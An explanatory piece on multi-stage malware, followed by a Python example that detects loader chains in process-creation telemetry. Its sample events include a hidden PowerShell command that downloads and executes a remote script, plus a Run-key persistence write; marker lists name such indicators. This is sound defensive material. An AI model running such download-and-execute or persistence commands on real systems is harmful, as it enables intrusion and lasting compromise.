Multi-stage malware is malicious code that delivers its capabilities in separate steps instead of all at once. The first component is often a small loader or dropper whose job is to fetch, decrypt, or launch later payloads. Those later stages may add persistence, steal data, enable remote control, or load additional modules in memory.
This design matters because splitting the chain lowers the chance that any single stage is detected. A lightweight first stage may look harmless, evade signature-based antivirus, or delay suspicious behavior until initial scanning or sandbox analysis has finished. In real attacks, defenders may see a benign-looking installer or document, followed by unusual network traffic, new child processes, or in-memory execution. Later stages are also the ones an analyst is least likely to recover: they may be served once per victim, decrypted only in memory, or withdrawn from the server after the campaign. Good defenses therefore focus on the whole chain rather than the file that arrived: inspect downloaders, correlate process creation with the parent that launched it, monitor persistence changes such as autorun entries and scheduled tasks, and isolate hosts after a suspicious launch rather than waiting for the final payload to identify itself. Multi-stage malware is common in campaigns that want flexibility, stealth, and the ability to swap payloads without changing the initial infection method.
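The chain-level detection described above, as an added example that is not part of the original article: process-creation events are parsed into a tree, and a chain is flagged when a document or mail application spawns a script host that then fetches something over the network or writes a persistence location, either itself or through a child. The event format, the field names, the application and script-host lists, and the sample events are all constructed assumptions for illustration, not a particular product's schema or telemetry.

```python
"""Detect a multi-stage loader chain in process-creation telemetry.

Added example. The event format, the detection policy and the sample
events below are assumptions for illustration, not a real product schema.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from ntpath import basename

# Hypothetical policy (assumption): a document or mail application is a
# plausible first-stage parent; a script host it spawns is the loader; a
# network fetch or a persistence write by the loader or any descendant
# marks the second stage.
STAGE0_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
NETWORK_MARKERS = ("http://", "https://", "downloadstring", "invoke-webrequest")
PERSISTENCE_MARKERS = ("currentversion\\run", "schtasks", "startup\\")

# Constructed sample events, one process creation per line:
# "pid | ppid | image path | command line". The 5001 process is a benign
# admin script launched from the shell and must not be flagged.
SAMPLE_EVENTS = r"""
2200 | 1000 | C:\Windows\explorer.exe | explorer.exe
3100 | 2200 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | "WINWORD.EXE" /n C:\Users\alice\Downloads\invoice.docm
4212 | 3100 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s2.ps1')
4390 | 4212 | C:\Windows\System32\reg.exe | reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\alice\AppData\Roaming\up.exe
5001 | 2200 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -File C:\scripts\inventory.ps1
""".strip().splitlines()


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        # Compare on the lower-cased file name so path and case differences
        # in the image field do not defeat the allow-lists above.
        return basename(self.image).lower()


def parse_events(lines: list[str]) -> dict[int, Proc]:
    """Parse 'pid | ppid | image | cmdline' records keyed by pid.

    The command line is the last field and may itself contain ' | ', so the
    split is limited to three separators.
    """
    procs: dict[int, Proc] = {}
    for line in lines:
        pid, ppid, image, cmdline = (f.strip() for f in line.split(" | ", 3))
        procs[int(pid)] = Proc(int(pid), int(ppid), image, cmdline)
    return procs


def find_chains(procs: dict[int, Proc]) -> list[tuple[str, list[int]]]:
    """Return (stage-2 behaviour, [stage-0 pid, loader pid, acting pid]) findings.

    The acting pid is omitted when the loader itself shows the behaviour.
    """
    children: dict[int, list[int]] = defaultdict(list)
    for p in procs.values():
        children[p.ppid].append(p.pid)

    def descendants(pid: int) -> list[Proc]:
        # Depth-first walk so grandchildren of the loader are inspected too.
        out, stack = [], list(children[pid])
        while stack:
            child = stack.pop()
            out.append(procs[child])
            stack.extend(children[child])
        return out

    findings: list[tuple[str, list[int]]] = []
    for loader in procs.values():
        parent = procs.get(loader.ppid)
        if loader.name not in SCRIPT_HOSTS or parent is None or parent.name not in STAGE0_PARENTS:
            continue  # not a script host, or not launched by a stage-0 application
        for actor in [loader, *descendants(loader.pid)]:
            cmd = actor.cmdline.lower()
            chain = [parent.pid, loader.pid] + ([actor.pid] if actor is not loader else [])
            if any(m in cmd for m in NETWORK_MARKERS):
                findings.append(("network-fetch", chain))
            if any(m in cmd for m in PERSISTENCE_MARKERS):
                findings.append(("persistence-write", chain))
    return findings


if __name__ == "__main__":
    procs = parse_events(SAMPLE_EVENTS)
    for verdict, chain in find_chains(procs):
        print(f"{verdict}: " + " -> ".join(f"{procs[pid].name}({pid})" for pid in chain))
```

The point of keying on the parent rather than on the script host alone is visible in the sample: the inventory script in process 5001 uses the same interpreter as the loader but was started from the shell, so it produces no finding, while the document-spawned PowerShell is reported twice, once for its own download and once for the Run key its child writes. In production the marker lists would be replaced by the organisation's own baseline of which applications legitimately spawn script hosts.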